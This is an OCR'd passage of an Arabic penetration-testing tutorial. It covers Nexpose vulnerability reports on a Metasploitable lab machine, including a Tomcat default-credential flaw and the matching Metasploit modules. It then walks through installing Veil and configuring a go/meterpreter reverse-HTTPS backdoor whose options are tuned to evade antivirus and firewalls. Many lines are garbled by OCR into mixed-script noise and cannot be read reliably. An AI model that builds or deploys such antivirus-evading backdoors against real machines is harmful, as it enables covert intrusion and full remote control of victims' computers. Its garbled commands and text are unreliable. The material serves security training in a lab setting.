مرة أخرى» إذا كان هناك استغلال» فسنراه تحت أيقونة الاستغلال» وإذا كان هناك أي برامج ضارة» فسنرى 
تحت أيقونة البرمجيات الخبيثة. الآن» جميع نقاط الضعف المدرجة ليست لديها استغلال باستخدام أداة 
لكن يتم ترتيبها بناء على المخاطرة. 

في لقطة الشاشة السابقةء يمكننا أن نرى أننا اكتشفنا أن كلمة مرور ۷۸٥°‏ هي 455۷0۲١١"‏ '. يمكننا 
الدخول ومحاولة الاتصال باستخدامء .۷١N٥‏ 


۷٣‏ هي خدمة تشبه إلى حد بعید 0s)‏ eءمRe.‏ سیظهر لنا سطح المكتب» وسیسمح لنا 
بالوصول الكامل إلى الحاسوب الهدف» مثل مها)sم‏ مامصه۸#. يخبرنا أن كلمة المرور لتسجيل 
الدخول هي 455۷0۲١‏ 0. هناك أيضًا باب خلفي على خادم B00۲‏ اامماS‏ قيد التشغيل» وقد 
و 
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الآن» سوف ننظر إلى شيء يمكن استغلاله. سنقوم بالنقر على أيقونة استغلال لترتيبها من خلال 


استغلالهاء ويمكننا أن نرى أن جميعهم لديهم شعار 0ء مما يعني آنه يمكن استغلالهم 
:Metasploit‏ 


باستخدام 


في لقطة الشاشة السابقةء لدينا Remote Shell Serv! ce‏ و Login Servlce Remote‏ التي یمکن 


استخدامهاء والتي سبق أن ألقينا نظرة عليها. الآنء سنقوم بالنقر فوق شيء لم نره من قبل» على سبيل 
المثال» ٩w0۲سPass 'omcat User and‏ tاDefau.‏ فى لقطة الشاشة التالية» يمكننا رؤية وصف 


لهذه الثغرة الأمنية: 


Default Tomcat User and Password 


ap ache-tomcat-default-password PUBLISHED Hoy 4, 2004 EXEPLOITABILIT او‎ 
Y 
Gritical (10 ب‎ DED Sep 1,2010 
CATEGORIES Apache Tomcat | Remote Execution 
B44 MODIFIED Jun 3, 2016 
UVES CVE-2009-3843 f CvE-2010-0557 
NCCI] CYSS SOORE 10 


ID 


SEVERITY 


RISK SOORE 


a rC 
ةرما‎ 


HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file uplead attacks, and thereby 
execute arbitrary code, by using the org.apache.catalina.manager.H TMLManagerServlet class to make requests to manageryhtmilfuplaaid. 


م 


في لقطة الشاشة التاليةء يمكننا رؤية المنفذ المشتغل وهو 8180 ويمكننا أن نرى لماذا يعتقد أن هذا 


الهدف المحدد عرضة لهذا الاستغلال: 


Name Site Status Protoco Porta Key Proof Last Scan Exceptions 
a T 1 nana tm n Jul 12th, 2018 @ 
Product Tomcat 1 pache Tomcat 
ased on the follow t5 
1. HTTP GET tt 
HTTP response code was an expected 401 
HTTP GET t to htî 
HTTP response code was a cted 200 
78: amg border alt=" Tı ache Software 
F dat alg ft 
rc="/mana nages/asf ۴ 
> <ھ‎ 
81: <a href=" http//tomcat apache _orq/ "> 


="0" alt=" The Tomcat Servlet/ JSP 


Containe 


f 


إذا مررنا للأسفل»ء فسيوضح لنا كيف يمكننا استغلاله: 


AFFECTS 


Asset 


EXPLOITS 


Exploit Source Link ¥ Description 
Apache Tomcat Manager Application Deployer ™ Metasploit Module This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is 
Authenticated Code Execution uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using 


/manager/html/ upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the 
selected target. For example, you must select the Windows target to use native Windows payloads. 


Apache Tomcat Manager Authenticated Upload Code j Metasploit Module This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is 

Execution uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The 
compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows 
payloads. 

Tomcat Application Manager Login Utility ™ Metasploit Module This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass. 

Apache Tomcat Manager - Application Deployer Jı Exploit Database 


في لقطة الشاشة أعلاهء هناك ثلاث وحدات مختلفة يمكن استخدامها لاستغلالهاء لكن ليس من الضروري 
أن تستغلها. في بعض الأحيان» نرى فقط وحدات يمكن استخدامها للتحقق من وجود هذا الاستغلال. لكن 
هذه الوحدات مرتبطة بهاء وإذا نقرت على أي من "لاستغلال" (اأهام×۴) ضمن رابط المصدر' 
Link(‏ urceهS)»‏ فسيأخذنا إلى صفحة ۸8017 التي اعتدنا أن نراها عندما نستخدم عناصر eاو0هق:‏ 


¢ | © û | https:/Nwww.rapid 7.com/db/modules/exploit/multi/http/tomcat_mgr_de ploy C@ | jQ Search tO ¥ 8 


E] Most Visited v [Offensive Security ™% Kali Linux Kali Docs "% Kali Tools ® Exploit-DB RQ Aircrack-ng ", Kali Forums  NetHunter ™ Kali Training @ Getting Started 


Back to search 


Apache Tomcat Manager Application Deployer Authenticated Code 
Execution 


This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a 
jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The 
compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. 


Module Name 
exploit/multi/http/tomcat_mgr_deploy Free Metasploit Download 


Get your copy of the world's leading penetration testing tool 


Authors 


jduck <jduck [at] metasploit.com> 


References 


ZD|-10-214 
CVE-2009-3548 
CVE-2009-3843 
OSVDB-60317 
CVE-2009-4189 
OSVDB-60670 
CVE-2009-4188 
BID-38084 
CVE-2010-O0557 
URL: http://www-01.ibm.com/support/docview.wss?uid=swg21419179 
CVE-2010-4094 
OSVDB-60176 


في لقطة الشاشة أعلاه» يمكننا أن نرى اسم الوحدة النمطية N2۳۴(‏ مءاuكه))»‏ والذي يمكننا فقط 


نسخه ولصقه في (اہامsھ‏ ۷6ء حیث یمکننا تشغیل ٣۶‏ ٥ہاامہ‏ W٥طء‏ تہ میں للاستغلال بنفس 
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الطريقة التي استخدمناها في قسم اأهامءه16 الأساسي. إذا انتقلنا لأسفل أكثرء فيمكننا رؤية المراجع 
)P۴E۴ERENCES)‏ الخاصة بالاستغلال المحدد: 


HEFERENCES 


SOUrCE 8 

BID 38084 

WWE LYE-2009-3843 
YE GWE-2010-O0557 


YF S4361 


في الجزء السفلي› سیظهر لنا التعويضات ۸N5(‏ ۷۴01۸1۱0 ۸۴) عن كيفية إصلاح هذا الاستغلال: 


RHEMEDIATIONS 


VULNERABILITY ROLLUP SOLUTIONS VULNERABILITY SOLUTIONS 


Change the Tomcat service administrator account password. 
Configuration remediation steps 


The Tomcat service has an administrator account set to a default configuration. This can be easily changed in conf/tomcat-users.xmıl 


لهذه الثغرة الأمنيةء سنقوم بتغيير كلمة مرور المسؤول ولن نستخدم التكوين الافترإضي. 


سنقوم الآن بالنقر فوق علامة التبويب "التقارير " )۸6٥0۲١5(‏ لإنشاء التقارير لكل مسح نقوم به: 


Create a report 


Name  metasploitable report Report time zonê (GMT -O0400] Eastern Time (US & Canada] 


Template 


ی ی ب ی Selected ny‏ اپ د ا ا 


: 
E‏ = تسکت ےہ پت 
چ gages e‏ 
T7‏ ججج 1 
LTTE ۳‏ 
ا F۴ enî Hmka ier al‏ 
¬ - الان إل 
َ ہے ا ےس 
ا ی س سس : 


rama mamas i mn a a 1a a Lam rama mamas i n as a a aa, Lamy 


Auıdit Report Baseline Comparison Executive Overview ۴ Highest Risk Vulnerabilities 2 


في لقطة الشاشة أعلاه» يمكننا أن نرى أن هناك تلاثة أنواع مختلفة من القوالب للتقارير. داخل إنشاء 
تقرير» يمكننا أن نرى أن هناك تقرير تدقيق يحتوي على الكثير من المعلومات التفصيلية للمبرمجين. يوجد 
أيضًا تقرير تنفيذي يحتوي على معلومات أقل وهو وضع للأشخاص ذوي المستوى الأعلى متل المديرين 
الذين ليس لديهم خبرة كبيرة في الأمور التقنية. يمكننا تحديد أي قالب نريده وتسميته أي شيء. في لقطة 
الشاشة السابقة« سنسمي هذا llتقرير‏ ڊ)report .metasploitable‏ إذI‏ نزلنا قلیلاًء فیمکننا تحدید 
التنسيق الذي نريده: 


File format 
PDF 
Scope 
select Scan Gelert Sites Assatg Filter report scope based 
Asset Groups or Tags on vulnerabilities 
Frequency 


Do not run a recurring report 


Configure advanced settings 


في لقطة الشاشة السابقة» يتم تعيينها على ۴۵۴. الآن» سنقوم بالنقر فوق 5٥4١‏ ٤٤٥ا٥8»‏ تم حدد 
الفحص المستهدف الذي نريد إنشاء تقرير له« وتحديد :metasploitable‏ 


Select the Site that was Scanned 


To select a scan to report on, first select the site in which the scan was run. 


Name Assets Vulnerabilities Risk Score wv Type Last Scan 


1 306 156,313 Static 7/12/2018, 


ai metasploitable 
۰ 1:23:01 AM 


الآن» انقر فوق 'حفظ وتشغیل التقریر " )SA۷E & RUN 11٣٤ REP0RT(‏ لإنشاء التقریر . 
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يمكننا أيضًا جدولة تقرير تلقائي في كل مرة يتم فيها إجراء الفحص. على سبيل المثالء إذا كنا نقوم 
بالمسح الضوئي كل أسبوع» فيمكننا أيضًا إنشاء تقرير كل أسبوع. الآنء يمكننا فقط تنزيل التقرير بالنقر 
فوق التقریر»› ولنری كيف يبدو : 


View reports 


Rows 10 1-1 of 1 


Report Name Most Recent Report ¥ 


%3 metasploitable report Jul 12th, 2018, 2:56 AM 


في لقطة الشاشة اعلاه» يمكننا ان نرى انه يحتوي على التاريخ» وانه يحتوي على العنوان» وأنه يحتوي 
٩‏ » م 0 * Nj‏ » چ * » ۴ SED‏ 8 » 
تفاصیل صعیره حول عملیات الاستغلال والمزيد مں الرسوم البيانية لإظهار المديرين التنفيذبين المخاطر 
ال تم العثور عليها ومدى اهمیتهم : 
Executive Summary‏ .1 
This report represents a security audit performed by Nexpose from Rapid7 LLC. It contains confidential information about the state of‏ 
your network. Access to this information by unauthorized personnel may allow them to compromise your network.‏ 


Site Name Start Time End Time Total Time Status 
metasploita blê July 12, 2018 01:13, EDT | July 12, 2018 01:23, EDT 9 minutes SUCCESS 


There is not enough historical data to display risk trend. 
The audit was performed on one system which was found to be active and was scanned. 


Vulnerabilities by Severity 


Moderate 


فى لقطة الشاشة أعلاه» يمكننا أن نرى أن 58٠0م×٠‏ يعرض علينا مزيدًا من التفاصيل وهو أكثر تقدمًا. 
إنه موجه نحو بنية تحتية أكبر» وشركات أكبر» حيث نحتاج دائمًا إلى التأكد من أن كل شيء مُحدثء 


وكل شىء مثبت» وليس هناك أي استغلالات. 
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Client-side attacks | ا‎ 


في هذا القسم» سنتعرف على الهجمات من جانب العميل. من الأفضل الوصول إلى جهاز حاسوب 
مستهدف باستخدام الهجمات من جانب الخادم» مثل محاولة البحث عن استغلالات في التطبيقات المثبتة 
أو في نظام التشغيل. إذا لم نتمكن من العثور على الاستغلالء أو إذا كان هدفنا مخفيًا خلف عنوان |١‏ 
أو باستخدام الشبكة المخفيةء فسنستخدم في هذه الحالة هجمات من جانب العميل. تتطلب الهجمات من 


جانب العميل من المستخدم القيام بشيء ماء مثل تنزيل صورة»ء وفتح رابط» وتثبيت تحديث يقوم بعد ذلك 
بتشغيل الشفرة في أجهزته. تتطلب الهجمات من جانب العميل تفاعل المستخدم وهذا هو سبب أهمية جمع 
المعلومات. إنه يجمع المعلومات حول تطبيقات الفرد ومن هم كشخص. للقيام بهجوم من جانب العميل 
بنجاح» نحتاج إلى معرفة أصدقاء ذلك الشخص والشبكة وموقع الويب الذي يستخدمونه وموقع الويب 
الذي يثقون به. في الهجوم من جانب العميل» عندما نجمع المعلومات» يكون تركيزنا هو الشخص»› وليس 
تطبيقاته أو نظام التشغيل الخاص به. 


ستكون الاآلة المستهدفة عبارة عن آلة ,00۷W‏ ۷1ء وستكون الآلة المهاجمة عبارة عن آلة أاة). لضمان 
لذا فإن عنوان ۴| المنفصل ليس ضروريا في هذه الحالة. 
في هذا القسم» سوف نتعلم كيف يمكن استخدام أداة تسمى الحجاب (اأ۷6) لإنشاء باب خلفي غير قابل 
للكشف. بعد ذلك» سنناقش الحمولات. بمجرد أن تكون لدينا فكرة موجزة عن الحمولات الصافيةء سنقوم 
بإنشاء باب خلفي من خلاله سننفذ هجمات من جانب العميل على نظامناء وتمكننا من الاستماع إلى 
الاتصالات. أخيرَّا» سوف نتعلم كيفية تنفيذ الباب الخلفي في الوقت الفعلي» بالإضافة إلى التقنيات التي 
بمكنا اتك اميا لحمانة نظاهسا من هذه المحمات. 
في الهجمات من جانب العميل» سنغطي الموضوعات التالية: 

ه هجمات من جانب العميل 


u + 
Vel | iN © 
»* » 


نظرة عامة على الحمولات 
تولید باب خلفي ب ا۷6 
الاستماع للاتصالات 
اختبار الباب الخلفي 
تحديثات (0١1‏ وهمية 
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في هذا القسم» سنتعلم كيفية إنشاء باب خلفي لا يمكن اكتشافه بواسطة برنامج مكافحة الفيروسات. الباب 
الخلفي هو مجرد ملف» وعندما يتم تنفيذ هذا الملف على جهاز حاسوب مستهدف» فإنه سيتيح لنا الوصول 
الكامل لجهاز الهدف. هناك عدة طرق لتوليد باب خلفي» لكننا مهتمون بإنشاء باب خلفي لا يمكن اكتشافه 
بواسطة برامج مكافحة الفيروسات. هذا ليس بالأمر الصعب فعله»ء إذا استخدمنا أداة تسمى -اأم۷ 


. Evasion 
سنقوم بتنزيل أحدث إصدار من ا۷ء وهو 3 باستخدام رابط 10آ التالي:‎ 
https: //github.com/Veil-Framework/Veil 


وتحدیتها. یتم استخدامه کثیرا عند تنزیل البرامج. یمکن تنزیل مستودع ا۷6 من خلال رابط ں611 أو 
بنسخه إلى طرفنا أة١١٣8۲۳].‏ توضح لقطة الشاشة التالية رابط 11ا6 الذي يجب علينا نسخه: 


EN 3.1. Check, version info in Weil a nımimr#ê) 


O ZS GOMITHES LF i kraiiclî JÛ rêl Eağes LE e E SFL-2.1 
E 


Î Carle Truncar Ipdalst rsaime r 274 Clone with HTTPS 


1 ib Ea 


EEE TSE IMEETETTHEN | # 
cun ik] pial setup or Eemenlary os elec 1ı 
IE'crTimnn rinê ii iromeriy 

Dowenload ZIF 

a Cerd Ë 3 Fi qalin ۲ vaiîads wîh hrm rrr 
TINO 1 GMOS IEE lÎ | Ft 1 TT ATeETAS THE 1 إ‎ 

SEL Ei Fı 3 j Fe ih êê FECL | 
LICENSE 11 I1I 


UE REAGHME. md 


الآن» قبل تنزيلهء نريد بالفعل تخزينه في دليل ٤ع٥/.‏ لذلك سنستخدم أمر 4 للتنقل إلى دليل مختلف» 
تم سنکتب /٥٥٤‏ لاختيار دليل يسمى .٥٥‏ الآن سنقوم بتشغيل 5| لسرد الدلائل المتوفرة» سنرى أن لدينا 
دلیل واحد فقط لبرنامج یسمی ٥٥٤٣‏ . 


root@kali :~# cd /opt 


root@kali :/opt# Is 
الآن» إذا أردنا تنزيل اأ۷6؛ فعلينا نسخ رابط المستودع من لاأ كما هو موضح في لقطة الشاشة‎ 
السابقة. ثم سنذهب إلى المحطتنا الطرفيةء لتحديد مكان التنزيل. لذا فإن أول ما سنقوم به هو تغيير الدليل‎ 
إلى أمه/» ومن ثم سنكتب 8١٠ا ا9ء وقم بإدخال عنوان ا۸ل الخاص بالمستودع. الأمر كالتالي:‎ 


root@kali :/opt# git clone https://github.com/Veil- 


Framework/Veil.git 


هناء يتم استخدام أمر 8١٠٠ء‏ لإخبار أ9 أننا نريد استنساخ أو تنزيل هذا الإطار أو البرنامج أو المشروع» 
قبل مشاركة الرابط مع اأ۷6. لتنزيل المشروع المطلوب» ما عليك سوى الضغط على 6۲ا٤.‏ 


إذا استخدمنا الأمر 5| لسرد ملفاتتاء فسوف نرى دليلا جديدا يسمى |اأ۷6. نحن قادرون على الانتقال إلى 
هذا الدليل عن طريق إدخال /اأ۷6 4ء. يتم استخدام الأمر 5| لسرد جميع الملفات المتاحةء بما في ذلك 
۷ والتي نحتاج إلى تثبيتها. للقيام بذلك» انتقل إلى دليل التكوين عن طريق إدخال /وأ؟٣هءc »cd‏ 
ثم قم بتشغیل أما۲ ٥ء‏ اasط‏ hء.مtupهء.‏ هذا البرنامج النصي سوف یثبیت ۴۷2510۸-اا۷/6. لتشغيل 
ملف قابل للتنفيذ من أة٣آ"6۲۳)ء‏ ندخل /. تم اسم الملف القابل للتتفيذ والذي هو ۸ك.م1أ56» كما هو 
موضح في لقطة الشاشة التالية: 


root@kali :/opt# Is 
root@kali :/opt# cd Veil 
root@kali :/opt/Veil# Is 


root@kali :/opt/Veil# cd config/ 8 
0 root@kali :/opt/Veil/config# Is 0 
۲ root@kali :/opt/Veil/config# ./setup.sh 8 


java WV point 


يجب أن ينشئ الأمر السابق النتائج التالية: 


o e A ا‎ sh 
Veil (setup script) [Updated] : 2018-05-08 


: https: / fu. well-framework. com/ 1 [Twitter] 


osverslon 
osmajversion 
arch 

trueuser 
userprimaryqgroup 
userhomed1r 
rootdir 

velldir 
outputdir 
dependenciesdir 
winedir 
winedrive 
gqempath 


/#opt/Veil 

#varyfliby/veill 

fvar/lib/veil/output 
#var/lib/veil/setup-dependencies 

#vary# libyveill/wine 
#var/lib/veil/wine/drive c 

Z:\varr Lib\veili\wine\drive c\Ruby1871bin\ gem 


[I] Kali Linux 2018.4 x86 64 detected... 


[?] Are you sure you wish to install Veil? 


Continue with installation? ([y]jes/[s]jilent,/ [N]o): 
.۷ في لقطة الشاشة السابقةء يمكننا أن نرى آنه يتم سؤالك عما إذا كنت ترغب في تثبيت اأ۷6» سنختار‎ 
لاحظ أن التثيت قد يستغرق بعض الوقت.‎ 
بعد التثبيت» نفتح أولاً المحطة الطرفيةء ثم سننتقل إلى دليل أمه عن طريق إدخال أمه/ 4ءء لأن هذا‎ 
لتغيير دليل العمل.‎ ٥۵ هو المكان الذي قمنا فيه باستتساخ اأ۷6. لذلك» نحن بصدد إدخال الأمر/اأ۷6‎ 
نحن الآن داخل دليل اأه۷. إذا قمنا بتشغيل الأمر كءاء سنرى أن لدينا اأ۷# قابل للتنفيذ. لذلك يمكننا‎ 
تشغيل هذا الملف التنفيذي من خلال وضع /. متبوعًا باسم الاستغلال وهو ۷م.اأ۷6.‎ 


root@kali :/opt/Veil# Is 


root@kali :/opt/Veil# ./Veil 


الآن سنقوم بتشغيل الأمر أعلاه» مما يؤدي إلى شاشة الترحيب باأ۷6» كما هو موضح في لقطة الشاشة 


التالية: 


Vell | [Version]: 3.1.11 


:/opt/Vell# ./Veil.py¥ 


[web]: https://www.veill-framework.com/ | [Twitter]: @VeilFramework 


Completely exit Veil 
Information on a specific tool 
List available tools 

Show Veil configuration 

Update Veil 

Use a specific tool 


Aã tools loaded 
Avalılable Tools: 


Evasion 
Ordnance 


Available Commands : 


EXIT 
De 
list 
options 
update 
use 


في لقطة الشاشة أعلاه» يمكننا أن نرى أن ا۷6 لديه أداتين. في القسم التالي» سنتعلم استخدام هذه 


الاتوات. 


java WV point 
Overview of Payloads | نظرة عامة على الحمولات‎ 


بمجرد تثبيت |أ۷6» سننظر في أوامره. الأوامر واضحة كما هو موضح في لقطة الشاشة التالية. يسمح 


لنا 6×٤‏ بالخروج من البرنامج» يتم استخدام |٣۴١‏ لتزويدنا بالمعلومات حول أداة معينةء يتم استخدام ٤اا‏ 
لسرد الأدوات المتاحةء يتم استخدام 43٤٠‏ ما لتحديث اأ۷6» يتم استخدام 58ا لتمكين استخدام أي أداة 
كما هو موضح في لقطة الشاشة التالية: 
py‏ ا ORE‏ 
Veil [Version]: 5 1.11‏ 
[Twitter]:‏ 1 ا E 22 veil- framework.‏ 
Main Menu‏ 
tools loaded‏ 2 


Avallable Tools: 


1} Evaslon 
2 Ordnance 


Available Commands : 


eEx1t Completely exit Veil 

info Information on a specific tool 
list List available tools 

options Show Veil configuration 

update Update Veil 

use Use a specific tool 


في لقطة الشاشة السابقةء يمكننا أن نرى أن هناك نوعين من الأدوات المستخدمة في اأ۷6: 
التهرب (١٥1ءهE۷]):‏ يتم استخدام هذه الأداة لإنشاء باب خلفي غير قابل للكشف. 


الذخائر :)0۲۵١4١٥6(‏ يتم استخدام هذه الأداة لإنشاء الحمولات التي يستخدمها ١0اه .٤۷‏ هذا أكثر 


من ادا اة 


الحمولة هي جزء من الكود» وهي تفعل مأ نربده. في هذه الحالة بعطينا اتصال عکسي وتنزيلات وتنفيد 
شيء ما على جهاز حاسوب المستهدف. الآن نحن نستخدم الأمر ه5 لتمكين استخدام أي أداة. نريد 
تشغيل ١٥1ءE۷2»‏ لذلك سنقوم بتشغیل استخدام الأمر 1 ۵ءا. عند تحمیل 0۸ siھ۷٤-‏ ا۷ء یجب أن 


نرى شيدًا مشابها للأمر التالي: 


Ve1ll-Evasilon 


Ve1ll-Evasion Menul 


41 payloads loaded 


Avallable Commands : 


back Go to Veil's main menu 

checkvt Check VirusTotal.com against generated hashes 
clean Remove generated artifacts 

EXIT Completely exit Veil 

info Information on a specific payload 

list List available payloads 

use Use a specific payload 


في لقطة الشاشة السابقةء يمكننا أن نرى أن اأ٥۷‏ تعطينا قائمة بالأوامر التي يمكن تشغيلها بهذه الأداة. 
نريد سرد جميع الحمولات المتاحةء والتي يوجد منها 41. في لقطة الشاشة التاليةء يمكننا أن نرى أن كل 
حمولة تنقسم إلى ثلاثة أجزاءء وقد سلطنا الضوء على الحمولات التي سنستخدمها وهي: 


15) go/meterpreter /rev_https.pYy 


VeillJEvaslonz>: list 


[web]: http5s://www.veil-framework.com/ | [Twitter]: @VeilFramework 


[*] Available Payloads: 
autoit/shellcode inject/flat.pYy 


auxiliary/coldwar wrapper . Py 
auxiliary/macro_ converter . py 
auxiliary/pyinstaller wrapper . py 


c/meterpreter/rev http.py 
c/meterpreter/rev http service. py 
cfmeterpreter/rev tCPp.Py 
c/meterpreter/rev tcp service. py 


cs/meterpreter/rev http. Py 
cs/meterpreter/revy https. py 
c5/meterpreter/rev TICP.PYy 
cs/shellcode inîect/base64. py 
cs/shellcode injecty/virtual. PY 


go/meterpreter/reyv http .py 
gqo/meterpreter/rev https.pPYy 
gqo/meterpreter/rev tCp.Py 
go/shellcode inject/virtual. py 
lua/shellcode inject/flat.py 


perl/shellcode inject/flat.py 


powershell/meterpreter/rev http. py 
powershell/meterpreter/rev https. py 
powershell/meterpreter/rev tCPp.Ppy 
powershell/shellcode inject/psexec virtual. py 
powershell/shellcode inject/virtual . py 


python/meterpreter/bind tcp.py 
python/meterpreter/rev http.py 
python/meterpreter/rev https.pYy 
python/meterpreter/rev tCPp.Ppy 


الجزء الأول من اسم الحمولة النافعة هو لغة البرمجة التي سيتم بها التفاف الحمولة. في لقطة الشاشة 
السابقةء يمكننا رؤية اللغة المستخدمة وتشمل C5‏ و" PowerShell, C&C, GO PyÎh0‏ و .NRuby‏ في 


هذا المثال» سنستخدم لغة 90. 


الجزء الثاني من الحمولة هو نوع الحمولة. بمعنى أخر» نوع الكود الذي سيتم تنفيذه على الشبكة المستهدفة. 


في هذا المثال» سوف نستخدم ۲٥۴6١‏ م۲٥‏ وهي ga Metasploit. Metasploit lqتnnمص alg‏ 


1 


إطار ضخم » وأحيادًا يتم استخدامه للقرصنة. يعمل 166۲۲۴۲6١‏ في الذاكرةء لذلك يصعب اكتشافه ولا 


يترك آترَا کبیرًا. باستخدام 1616۲٥۲6۲6۲‏ يمكننا الوصول الکامل عبر جھاز حاسوب مستهدف. يسمح 
لنا بالتصفح عبر نظام الملفات» وتثبيت أو تنزيل الملفات» وأآكثر من ذلك بكثير. 


الجزء الثالث من اسم الحمولة النافعة هو الطريقة التي سيتم استخدامها لتأسيس اتصاله. في مثالناء هذا 
ھور ئم٤٤‏ _۲۴۷. حیث يشير ۲۴۷ إلى العكس »)۲۴۷٠۴٠5٥۴(‏ و كما" هو البروتوكول الذي سيتم استخدامه 
لتأسيس الاتصال. في لقطة الشاشة السابقةء هناك بعض الأمثلة على م٥_۷٠٠»‏ والتي تنشئ اتصال 
۲ عکسي. 


الاتصال العكسي هو حيث يتصل الجهاز الهدف بجهاز المهاجم عبر الباب الخلفي. تتجاوز هذه الطريقة 
برامج مكافحة الفيروسات» لأن الاتصال لا يتم توجيهه إلى الحاسوب المستهدف» بل إلى المهاجم بدلا 
من ذلك. في مثالناء سنستخدم المنفذ 80 أو 8080 الذي تستخدمه العديد من مواقع الويب» بحيث يظهر 
الاتصال كاتصال موقع غير ضار . 


Generating a Veil ۷٥أاب انشاء باب خلفی‎ 
backdoor SS 


الان» نحن بصدد توليد ١ا۷6‏ باستخدام الباب الخلفي. ولا سنقوم بتشغبل آمر 4 ثم سنقوم بكتابة 
الأمر 1 ناء لأننا نريد استخدام ١0أكة۴۷.‏ الآن اضغط على ۴١16١‏ لأننا نرغب في استخدام الحمولة 


الخامسة عشرةء لذلك سنفود يتغل لمر 15 5#ناء النحو التال : 
ر وح ډل ا دمر 


VellJEvaslonz: USE 15 


[Web]: https://www.veil-framework.com/ | [Twitter]: 


Payload Information: 


Name : Pure Golang Reverse HTTPS Stager 

Lanqgquaqgê : 8 

Rating: Normal 

Description: pure windows/meterpreter/reverse https stager, no 
shellcode 


Payload: go/meterpreter/rey_ https selected 
Required Options: 


Description 
Check for VM based MAC addresses 
Require X number of clicks before execution 
COMPILE T0 EXE ٠ Compile to an executable 
CURSORCHECK Check for mouse movements 
Check for a minimum number of gigs for hard disk 
Optional: Required system hostname 
Virtual Virtual or Heap 
IP of the Metasploit handler 
1 Port of the Metasploit handler 
MINPROCS Minimum number of running processes 
PROCCHECK Check for active VM processes 
Optional: Minimum number Of processors 
Check for at least 3 gigs of RAM 
Optional: Sleep "¥" seconds, check if accelerated 
Optional: The required user account 
Prompt user prior to injection 
Check if system uses UTC time 


Available Commands : 


back G0 back to Veil -Evasion 

exit Completely exit Veil 
gqenerate Generate the payload 

options Show the shellcode's options 
set Set shellcode option 


الآن سنقوم بتغيير 11051 ۴| الخاص بحمولة البیانات إلى عنوان ۴| الخاص بجهاز أا باستخدام 
اللات اال 


علينا تشغيل الأمر وا؟١هء؟اء‏ للحصول على عنوان ۴| الخاص بجهاز أاةK.‏ سنقوم الآن بتقسيم الشاشة 
عن طريق النقر بزر الماوس الأيمن وتحديد 10١20١٤21۷‏ ام5 ثم تشغيل الأمر. في لقطة الشاشة 
التاليةء يمكننا أن نرى أن عنوان جهاز كالي هو 10.0.2.15ء وهو المكان الذي نريد أن يعود فيه اتصال 
الحاسوب الهدف مرة واحدة بعد أن تم تنفيذ الباب الخلفي 00۲ل )>هط: 


:opt/Vell# ifconfig 
ethO: flags=4163=UP , BROADCAST , RUNNING ,MULTICAST= mtu 1500 
inet netmask 255.255.255.09 broadcast 10.0.2.255 
inet Tfe8O0::a0O0:Z27TTf:Te0b:9166 prefixlen 64 scopeid Ox20=link= 
ether 08:00:27:0b:91:66 txgqueuelen 10090 (Ethernet } 
RX packets 562137 bytes 816777958 (778.9 MIB) 
RX errors O0 dropped O overruns O frame O 
TX packets 280585 bytes 20028728 (19.1 MiB) 
TX errors O dropped O overruns O carrier O collisions O 


lo: flags=73<UP , LOOPBACK, RUNNING= mtu 65536 
inet 127.0.0.1 netmask 255.0.0.0 
inet ::1 prefixlen 128 scopeld Ox10shost=> 
loop txqueuelen 1000 (Local Loopback) 
RX packets 54314 bytes 29981222 (28.5 MIB) 
RX errors O0 dropped O overruns O frame O 
TX packets 54314 bytes 29981222 (28.5 MIB) 
TX errors O dropped O overruns O carrier O0 collisions O 


لتعيين 1۳051 ك 10.0.2.15ء سنقوم بكتابة الأمر 56 يليه الخيارات التي نريد تغييرهاء كما هو 


موضح أدناه: 


| seLHOSTI10.0.2.15 | 


نحتاج الآن إلى تغيير 1۲0۸١‏ إلى 8080. يتم استخدام هذا المنفذ أيضًا من قبل خوادم الويب» لذلك 


لن نبدو مشبوهين ويجب أن نتجاوز جدار الحماية. سنقوم الأن بتعيين المنفذ الصحيح» وأدخل الأمر 
1۴٥۸ 0‏ اهs.‏ كما هو موضح في لقطة الشاشة التالية: 


[gو0o/meterpreter/rev‎ https>>]: options 


Payload: go/meterpreter/rev https selected 
Required Options: 
Description 


Check for VM based MAC addresses 
Require X number of clicks before execution 
Compile to an executable 
Check for mouse movements 
Check for a minimum number of gigs for hard disk 
Optional: Required system hostname 
Virtual Virtual or Heap 
10.0.2. 15 IP of the Metasploit handler 
8980 Port of the Metasploit handler 
MINPROCS X Minimum number of running processes 
PROCCHECK FALSE Check for active YM processes 
PROCESSORS X Optional: Minimum number of processors 
RAMCHECK FALSE Check for at least 3 gigs Of RAM 
SLEEP 1 Optional: Sleep "¥" seconds, check if accelerated 
USERNAME Optional: The required user account 
USERPROMPT Prompt user prior to injection 
UTCCHECK Check if system uses UTC time 


Available Commands : 


Eel Go back to Veil -Evasion 

exit Completely exit Veil 
generate Generate the payload 

options Show the shellcode's options 
set Set shellcode option 


ستتجاوز هذه العملية كل برنامج مكافحة فيروسات باستثناء ۸۷6 وفقًا للتجربة. تعمل برامج مكافحة 
الفيروسات باستخدام قاعدة بيانات كبيرة من التواقيع. تتوافق هذه التواقيع مع الملفات التي تحتوي على 
تعليمات برمجية ضارةء لذلك إذا تطابق ملفنا مع أي قيمة في قاعدة بيانات» فسيتم تعليمه على أنه فيروس 
أو كبرنامج ضار . لهذا السبب نحتاج إلى التأكد من أن الباب الخلفي الخاص بنا فريد من نوعه قدر 
الإمكان حتى يتمكن من تجاوز كل قطعة من برامج مكافحة الفيروسات. يعمل ۷6١‏ بجد من خلال تشفير 
الباب الخلفي» والتشويش عليهء وحقنه في الذاكرة حتى لا يتم اكتشافهء لكن هذا لا يمشي مع ۸۷6. 
للتأكد من أن الباب الخلفي الخاص بنا يمكنه تجاوز 4۷6 نحتاج إلى تعديل الحد الأدنى لعدد المعالجات 
المستخدمة به. في هذه الحالةء يتم ضبطه على 1. استخدم الأمر التالي للقيام بذلك: 


1 eermocEsso1 J 


